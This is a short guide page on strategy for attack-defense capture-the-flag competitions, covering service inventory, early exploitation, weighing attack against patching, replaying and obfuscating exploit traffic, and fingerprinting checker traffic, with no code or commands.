Skip to content

Attack-Defense Strategy

This section outlines some strategies to playing A/D CTFs, ranked from least to most advanced.

Taking Inventory

Gathering information about each service at the start of the CTF, and using this to assign players and prioritize work will optimize your expected return from searching for vulnerabilities.

Tools like CTFNote were made specifically to help with this task.

Low Hanging Fruit

Because exploits deployed early can collect points over the entire CTF, taking a basic overview of each service and identifying low-hanging fruit before the network opens is essential. Moreover, found vulnerabilities can be patched before other players have the chance to exploit them.

Attack vs Defense

Since most scoring formulas favour attack over defense, players should prioritize writing exploits over patching, except in those case where writing the exploit is disproportionally difficult. Conversely, teams should prioritize working on exploits which are easy to write, but difficult to patch.

Attack Replay & Obfuscation

Most exploits can be stolen by observing network traffic, and reversing an exploit this way is often easier than finding it yourself. Some monitoring tools, notably tulip, will even automate part of the process, providing a Copy as Pwntools button for generating python scripts using pwntools which mimic the recorded traffic.

Because of this, it may pay off to obfuscating your exploit traffic, especially when the vulnerability is difficult to find and has not been exploited yet.

Checker Fingerprinting

Capturing game traffic directly after network open can help differentiate checker from exploit traffic at a later stage in the game. As long as the service is not immediately exploited, early-game traffic is less likely to originate from other players. This traffic capture may prove useful at a later stage of the game to differentiate checker- from exploit-traffic.

If the checker behaves in a way that players can detect without being able to replicate it themselves (e.g. using a specific private key for a crypto service), it allows teams to build so-called Superman-Defenses, preventing any non-checker traffic from reaching the service.